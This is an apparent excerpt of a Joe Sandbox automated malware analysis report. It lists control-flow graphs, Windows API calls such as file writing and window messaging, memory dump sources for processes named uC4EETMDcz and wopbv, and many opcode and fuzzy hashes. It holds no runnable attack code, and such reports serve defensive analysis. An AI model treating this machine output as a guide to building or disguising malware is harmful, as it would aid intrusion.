                                              • Instruction Fuzzy Hash: D92191719001196ADB21EBB1CD89FDEB6BCAB08314F6005B7F244B20D1D7B89B858F68
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 799a4728681ba60eeb94c60f75fd4730c503bb4ef67aa5004236aa76b25f6b33
                                              • Instruction ID: 80d44e8b977b44856e8d19745a7f8469b4832bf1aa40be1deba1804620d7c2bf
                                              • Opcode Fuzzy Hash: 799a4728681ba60eeb94c60f75fd4730c503bb4ef67aa5004236aa76b25f6b33
                                              • Instruction Fuzzy Hash: 09D05EA73081152FB708504BAE078ABAA5EC2D26683089437B500C02A2F550DA4500B0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 505 40177f-4017a5 GetWindowThreadProcessId GetCurrentProcessId 506 4017a7-4017bd GetClassNameA 505->506 507 4017fa-401803 505->507 506->507 508 4017bf-4017e7 call 402c3b call 402d55 506->508 508->507 513 4017e9-4017f5 SendMessageA 508->513 513->507
                                              APIs
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00401795
                                              • GetCurrentProcessId.KERNEL32 ref: 0040179A
                                              • GetClassNameA.USER32(?,?,000000FF), ref: 004017B6
                                              • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 004017F5
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: Process$ClassCurrentMessageNameSendThreadWindow
                                              • String ID:
                                              • API String ID: 1760342835-0
                                              • Opcode ID: d5a2fe3926074b874b85c201b99420035db7baa3299ba758230e81be0e5195ca
                                              • Instruction ID: 5d5a6178dc5f0634159930b4a56eada182b2654b8324d09f66e59d4491047fc3
                                              • Opcode Fuzzy Hash: d5a2fe3926074b874b85c201b99420035db7baa3299ba758230e81be0e5195ca
                                              • Instruction Fuzzy Hash: 540181B55001197ADB20AA61DC82FEF7A6CAB00749F0000BB7709F60D1EAB49E429E6C

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 514 40304e-403078 CreateFileA 515 4030a5-4030a9 514->515 516 40307a-4030a0 SetFilePointer WriteFile CloseHandle 514->516 516->515
                                              APIs
                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 0040306D
                                              • SetFilePointer.KERNEL32(?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 00403084
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000), ref: 00403098
                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080), ref: 004030A0
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandlePointerWrite
                                              • String ID:
                                              • API String ID: 3604237281-0
                                              • Opcode ID: 687355ab6ddc4e107ccd9487f6c68e3ea19a4e8ff17dce9f0f54723a7c8f560e
                                              • Instruction ID: 8f58c3df1896ff6b503c7d1ead60e913e467ede25dabb4556bff6f44759aa335
                                              • Opcode Fuzzy Hash: 687355ab6ddc4e107ccd9487f6c68e3ea19a4e8ff17dce9f0f54723a7c8f560e
                                              • Instruction Fuzzy Hash: 7CF05E32640208BAEF21AE95DC47FCE7F29EB04725F204166F710B80E0DB766B20A75C

                                              Execution Graph

                                              Execution Coverage:11.5%
                                              Dynamic/Decrypted Code Coverage:99.1%
                                              Signature Coverage:0%
                                              Total number of Nodes:319
                                              Total number of Limit Nodes:42

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2
                                              • API String ID: 0-450215437
                                              • Opcode ID: df49773ee9c5b075041d1549f7156634eef748c027c2a487bbd51abe7e411516
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 134c6264ffd4aa066428e84ce06868e2fa1fd50b2d9ca390cd241abe87872d74
                                              • Instruction ID: 3f1efcc2683704d48e25836f9bfc67d7b3fe148761372e1834bd5e131e0f92c0
                                              • Opcode Fuzzy Hash: 134c6264ffd4aa066428e84ce06868e2fa1fd50b2d9ca390cd241abe87872d74
                                              • Instruction Fuzzy Hash: 8F410671B102099FCB24DB68D945BAEBBF6FF84710F104429E55AD7280DB709902CB54
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ec27ecf2024f7209d55d1561aebd2f85ba0e468c542046016f33579b2660cc2c
                                              • Instruction ID: a93b6bf6aaaeca922319110230e5945fff6d1f4b48b8960c71d7cde338c94231
                                              • Opcode Fuzzy Hash: ec27ecf2024f7209d55d1561aebd2f85ba0e468c542046016f33579b2660cc2c
                                              • Instruction Fuzzy Hash: 18418872A107059FCB20CF69C588A6BBBF2FF98300F18891DE98697A51DB30E904CF55
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed52d94deb678103cee412c48b1683a8d71d29a6b89a67d2e0340d3d2f21f9f7
                                              • Instruction ID: befc72f5685f4ed833543ac9be4aae33d4dc5920eef6e1927d4c89872eae1ceb
                                              • Opcode Fuzzy Hash: ed52d94deb678103cee412c48b1683a8d71d29a6b89a67d2e0340d3d2f21f9f7
                                              • Instruction Fuzzy Hash: E6413D313106109FD308EB69C8A8F2B7BE6AFD8704F104468E60ACB3A5DF75EC428794
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56df084bb6e5524294dbdab2b03b8e59781171a22306ca40a77f878dbcf3a416
                                              • Instruction ID: 60643173950c8feb1f4b1ae452c372d9ac101ddfb0e1a8f55504b8f9346ce9cb
                                              • Opcode Fuzzy Hash: 56df084bb6e5524294dbdab2b03b8e59781171a22306ca40a77f878dbcf3a416
                                              • Instruction Fuzzy Hash: 6B313C353106109FD308DB69C8A8F2B7BE6AFD8714F104468E60A8B3A5DF71EC42C794
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2633577760.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5450000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b52d85cf5910b0bb88283aa8fd2ef90c562a5e1af22f945d85b8547906be301
                                              • Instruction ID: e04631d6f5a9a9e205d2e1108026400f9cb92d038ecb482a213063a0334bb298
                                              • Opcode Fuzzy Hash: 1b52d85cf5910b0bb88283aa8fd2ef90c562a5e1af22f945d85b8547906be301
                                              • Instruction Fuzzy Hash: 37410A34A412189FEB25CB14C891FADB7B1BB49320F1041EAE909AB392C671ED81CF90
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e06211db2225c1dd51e24f81408f5ea57f688c91df83fba6e5a3e6f68b32c71
                                              • Instruction ID: bdd3d6a39df4142067285d2175e3e726f5f91f9e38da340611c6e9a67ae47758
                                              • Opcode Fuzzy Hash: 1e06211db2225c1dd51e24f81408f5ea57f688c91df83fba6e5a3e6f68b32c71
                                              • Instruction Fuzzy Hash: 57411839A04009CFCB44DF99D884ABDB7B2FB88310F28C565EE1697251C735ED469F52
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e741605b36886e3c04003444c79425db1344157d7ccdbaf8a4b84a07e7f04803
                                              • Instruction ID: daead73932c4a3134644d07c39e9f9044acc359e92b9289ed2f6d5c7f5a41b69
                                              • Opcode Fuzzy Hash: e741605b36886e3c04003444c79425db1344157d7ccdbaf8a4b84a07e7f04803
                                              • Instruction Fuzzy Hash: 9731E636610105DFCB05DF68D898EA9BBF2FF48320B1640A8EA099B372D731ED55CB40
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e9d2a436b36551702b1da2be2da8cfceee40972888875aa35806eecaa011a90
                                              • Instruction ID: c60777c31de2cd078c53701e0165bce773e4286f09caade19ce71c8683b520ea
                                              • Opcode Fuzzy Hash: 8e9d2a436b36551702b1da2be2da8cfceee40972888875aa35806eecaa011a90
                                              • Instruction Fuzzy Hash: 8D311835A501199BDB08DBA5D895AEFB7F6FF98310F108069E806B7260CB719D05CFA4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 728574b61133d9728f27b06d64ec1bbabb39cb9f8006264f6232a16422e6a962
                                              • Instruction ID: 43fef89e6420df9f0ecf5dfdfdd77e8ccc19b0a28898f154b9da75045c6bcc32
                                              • Opcode Fuzzy Hash: 728574b61133d9728f27b06d64ec1bbabb39cb9f8006264f6232a16422e6a962
                                              • Instruction Fuzzy Hash: B641F774E102099FCB04DFA9D895AEEBBF5FF88310F10806AE905A7360DB71A941CF50
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4e0d0509d51faa6469493631bc42a651c0efd9fbcb1f6bc00f2f23b043d975b7
                                              • Instruction ID: 19df34d6c9544dfb058e7045b93faf37e4db5e670c4f003fecd7f108485d33f0
                                              • Opcode Fuzzy Hash: 4e0d0509d51faa6469493631bc42a651c0efd9fbcb1f6bc00f2f23b043d975b7
                                              • Instruction Fuzzy Hash: 93210A3130C349DFE791863A98A437A6BD4EB51364F2C453ADE92C6291E2E4CB44D3D3
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1e0bbb0930aff95bf0d5f0b830312868951bfb87bacb63010836ff6fb45d1a6
                                              • Instruction ID: 5b4c627bfbd483e97ef02d375eb3616e4a06ffc45a855069f225ea2002b0f455
                                              • Opcode Fuzzy Hash: b1e0bbb0930aff95bf0d5f0b830312868951bfb87bacb63010836ff6fb45d1a6
                                              • Instruction Fuzzy Hash: F8311770E14209CFDB08CF9AD885AEEBBFAFF88300F15802AE905A7244D7705A45CF94
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d382736ccf1bdcaeac48d31b7d54a9a90222a35260197ad14650eb60641ecd7c
                                              • Instruction ID: 3737fac9b6056a5e7fc518b593455e636285a5d107f32556a71f4bf0b272b1ec
                                              • Opcode Fuzzy Hash: d382736ccf1bdcaeac48d31b7d54a9a90222a35260197ad14650eb60641ecd7c
                                              • Instruction Fuzzy Hash: 6D314670E10209CFDB08CFA9D885AEEBBF6FF88304F15802AE915A3254E7745A45CF94
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8a73046a96448b9f5859edbe6b460b7b4644f95a10c572f3270ea114396991d1
                                              • Instruction ID: bff63070c36ac2fd34711e81dc34c8df417285f62e9ee23083b46543deac5f29
                                              • Opcode Fuzzy Hash: 8a73046a96448b9f5859edbe6b460b7b4644f95a10c572f3270ea114396991d1
                                              • Instruction Fuzzy Hash: 8A21A334B00119CFDB98EB76D4046BA33B2EBC4354F2D8569EE06C7258DB71CD029B82
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e3cc567c06559cb3a867f96b0e0d9c5fe5ada227e29c11355f32567611d3ec5
                                              • Instruction ID: 0970038c748059417dcd127d9b5d9873e93252392f49091074307093f2a7df1d
                                              • Opcode Fuzzy Hash: 2e3cc567c06559cb3a867f96b0e0d9c5fe5ada227e29c11355f32567611d3ec5
                                              • Instruction Fuzzy Hash: 4A2128323142108FC324DB69F884B6BBBEAEF80320B15857ADA4ECB151DB70EC42C754
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c841eec513afce791366ff80bcdbb04965313a320d56eb4f98b885bf31e93de
                                              • Instruction ID: c3926842edd9bb0d0d27da33dd5e7af8eaebbb88880ad969066bf0bca69898ce
                                              • Opcode Fuzzy Hash: 1c841eec513afce791366ff80bcdbb04965313a320d56eb4f98b885bf31e93de
                                              • Instruction Fuzzy Hash: CA315A70E11209CFDB44DFA9D885AEEBBF6FF48304F154066E905A3250E7305A40CF95
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d9c3ad946acafc5cd55d2ff875458f63f5d331fc91a6bc01b8112043144a0d2d
                                              • Instruction ID: 2a3ed0d4466ce6a406903c3dd3cf98685c35b495332e056257cfa91bcb0fc6a7
                                              • Opcode Fuzzy Hash: d9c3ad946acafc5cd55d2ff875458f63f5d331fc91a6bc01b8112043144a0d2d
                                              • Instruction Fuzzy Hash: 10218730B202559BCB04AB65D85D7AFBBE7AFD4700F104029E80AEB394CF745C46CB95
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04deb4cc41fba0d4d2843b678ac456ad13e985087211b84642c2ea216b6530bc
                                              • Instruction ID: fb282a4504777f97a42b5412834b28c60b7a8f5a1300b65744aaa0646d1cf986
                                              • Opcode Fuzzy Hash: 04deb4cc41fba0d4d2843b678ac456ad13e985087211b84642c2ea216b6530bc
                                              • Instruction Fuzzy Hash: 0B313CB0E04209CFDB44DFAAD8483FEBBB1EB89304F109129D529A3250D7B45A45DF96
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f23580ad97ed207dff3adbdabe447c3c47a365f7990d7d1d8f5d7c82db7df8c
                                              • Instruction ID: 744108b035c36ad531ab6b08a01c669954616ea7f37e20dc1a3733f4339ea1cc
                                              • Opcode Fuzzy Hash: 5f23580ad97ed207dff3adbdabe447c3c47a365f7990d7d1d8f5d7c82db7df8c
                                              • Instruction Fuzzy Hash: BE215E30B005089FDB48DBA9C958BADBBF2AF8D700F214469E606EB3A1DA755D01DB91
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca9781ab9671b209d68a6fa45f6deb8f9d2b5fe14a7d1d610c1322ea7e8b717b
                                              • Instruction ID: 283dce2562fde3913abf20fc0517b57c351439c9af31120cb0cbc15f3e1d574c
                                              • Opcode Fuzzy Hash: ca9781ab9671b209d68a6fa45f6deb8f9d2b5fe14a7d1d610c1322ea7e8b717b
                                              • Instruction Fuzzy Hash: 28217474B206098FCB04EF68C5589AFB7F5FF99700F10412AD906A7320EF74AA46CB95
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 12276160b26d952db199ff49810d0e39692c86f0eee086b6a6a4874db57e07bf
                                              • Instruction ID: 208a7a34576ba0a6a0fb131f53737fc146058c7f828a2ca3b211e9716951451a
                                              • Opcode Fuzzy Hash: 12276160b26d952db199ff49810d0e39692c86f0eee086b6a6a4874db57e07bf
                                              • Instruction Fuzzy Hash: 24316DB0D01249DFEB80EFA9D5897ADBBF1FF49308F2080AAD115A7254E7754A80DF12
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a299e6b4469f3f5f3b3b6b7582bcdb3bc87e2f69e3c3222439014dbeaa53d8ca
                                              • Instruction ID: 7d6e583dc3a08b49ad444698424c9fc22c265e9c8087e504477d2ce2251d1fae
                                              • Opcode Fuzzy Hash: a299e6b4469f3f5f3b3b6b7582bcdb3bc87e2f69e3c3222439014dbeaa53d8ca
                                              • Instruction Fuzzy Hash: 03316FB0D01109DFDB80EFA9D5887ADBBF1FF49308F2080AAD119A3254E7754A80DF12
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4b18dcae2a8e30901965a69dd964a6f498c3a74481183c39669c85e3a9d34b83
                                              • Instruction ID: b984726548a5cf7a81ce63d9a915b5f2297e9ccf63ba891d23eeda76d8695b1d
                                              • Opcode Fuzzy Hash: 4b18dcae2a8e30901965a69dd964a6f498c3a74481183c39669c85e3a9d34b83
                                              • Instruction Fuzzy Hash: 3C213B74E10609CFDB44DFAAD885AAEB7F6FF99301F108069D809A7254EB749A41CF48
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7c658b90ce1fb1806fd32722d89976562611efc28d32fc3a8865f6a40ebfa27
                                              • Instruction ID: 6a87bae41cf9ce853a90464b4ba140b86b1ec897a15d6f8de4307c4729eda32e
                                              • Opcode Fuzzy Hash: d7c658b90ce1fb1806fd32722d89976562611efc28d32fc3a8865f6a40ebfa27
                                              • Instruction Fuzzy Hash: D7215E75E10209CFDB44DFAAD8857AEB7F2FF98301F1480A9D409A7214EB745A41CF48
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632165265.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5050000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ff7f3feb134866050a407f977d28db190c9e44cbaedcd7e894e6a9b0894252a
                                              • Instruction ID: 88c6a3a8e80d1cb7a87538761603b70ad952a2f6423f1c86fd6fa33ad55c6edd
                                              • Opcode Fuzzy Hash: 6ff7f3feb134866050a407f977d28db190c9e44cbaedcd7e894e6a9b0894252a
                                              • Instruction ID: cea6e9ae43232149fef129013757b47a8f7cfdbb7f73b16e00e89e5d4c6934c5
                                              • Opcode Fuzzy Hash: 9bec33e42b2450a5c28131ada631a00f29bc2b414ca9e233e2fab549a024b61e
                                              • Instruction Fuzzy Hash: D7F09234A51508DFDB94CF98D958BADBBF0AF48315F204059E606AB2A1CBB19D40CF51
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f184b7f8713c6b2178f181dc2f0ad8a32477109a76ea5f946dc7de14fa723948
                                              • Instruction ID: 08ad268f7d51c55fa84a105a40ed6552447d13b98e9c55aef72844e6895d4aae
                                              • Opcode Fuzzy Hash: f184b7f8713c6b2178f181dc2f0ad8a32477109a76ea5f946dc7de14fa723948
                                              • Instruction Fuzzy Hash: EDE01271900259DFD701DFA498687BE7BF4EB4A319F004666D504D7160FB718E409B96
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad7ffd17540c5a1df20ed7612d689b633b1f3430b6d939009c83b426da87d314
                                              • Instruction ID: 4235a15a5fedaaebdea0ddded192902d983a1356a9b3d4c63092812ede05c54e
                                              • Opcode Fuzzy Hash: ad7ffd17540c5a1df20ed7612d689b633b1f3430b6d939009c83b426da87d314
                                              • Instruction Fuzzy Hash: B9F03974908248EFCB40CF98C840BAEBFF9AF49200F14C19AEC5897341C6719E51DF94
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1dc32812d2208ee329ba21ee9a3c0b6504bcd9675c6cf660becd2b1cb922bf35
                                              • Instruction ID: 65fd31ef70f1968a34127863fb74e9f56bca481cb113f1b729873f5649d86f14
                                              • Opcode Fuzzy Hash: 1dc32812d2208ee329ba21ee9a3c0b6504bcd9675c6cf660becd2b1cb922bf35
                                              • Instruction Fuzzy Hash: 0BF0A574D04208EFCB84DFA9D840AACBBB5EB48300F10C1AA9D1893350D775AF55DF41
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 644d792301fa0e6d53a8b8d76f4206e347835f150806959b090a99a805f17480
                                              • Instruction ID: 129b5dd4aa38b98f1fffef871de4da03f43d7d9989b5e064ce99caf2867951e9
                                              • Opcode Fuzzy Hash: 644d792301fa0e6d53a8b8d76f4206e347835f150806959b090a99a805f17480
                                              • Instruction Fuzzy Hash: 72E02631108008DBD344CBD0C500B79B7B4EF47308F24819CCC0887361CA339E03CA41
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1f2cb2e0a9bfbcaab79529a562376c562d4e4f949193f3a261e4cebc967229a5
                                              • Instruction ID: a20f77e75d8a21df1e1759b51b021d1965a9e873fe3ea26fd9f87e62540e8180
                                              • Opcode Fuzzy Hash: 1f2cb2e0a9bfbcaab79529a562376c562d4e4f949193f3a261e4cebc967229a5
                                              • Instruction Fuzzy Hash: 88E03975D05208AFD704DF94D9427ACBBB8EB88204F1481A9DC1893341E6719A02DF84
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d30d45e87dd663beb57b6e97c954b1594e39c8a9742a84ce13322dc7dd094a8
                                              • Instruction ID: 494c0879a2d92c614721a74c5feaaa0ebf087e4e791bf53c94771ceb2e8ff79c
                                              • Opcode Fuzzy Hash: 9d30d45e87dd663beb57b6e97c954b1594e39c8a9742a84ce13322dc7dd094a8
                                              • Instruction Fuzzy Hash: 60E06D349592C8EFC700CBA5D5007ACBFF5EB4A214F0482EED86A43252D6355A02DF44
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0df44cd345911673add6ce4eef2214322e4f46f672ca227d1504217e86511a4c
                                              • Instruction ID: 3aa6b2bdf6637e79cd69f3456fd2835806a59af2ab36f1544a7fd2e1bfd40ef6
                                              • Opcode Fuzzy Hash: 0df44cd345911673add6ce4eef2214322e4f46f672ca227d1504217e86511a4c
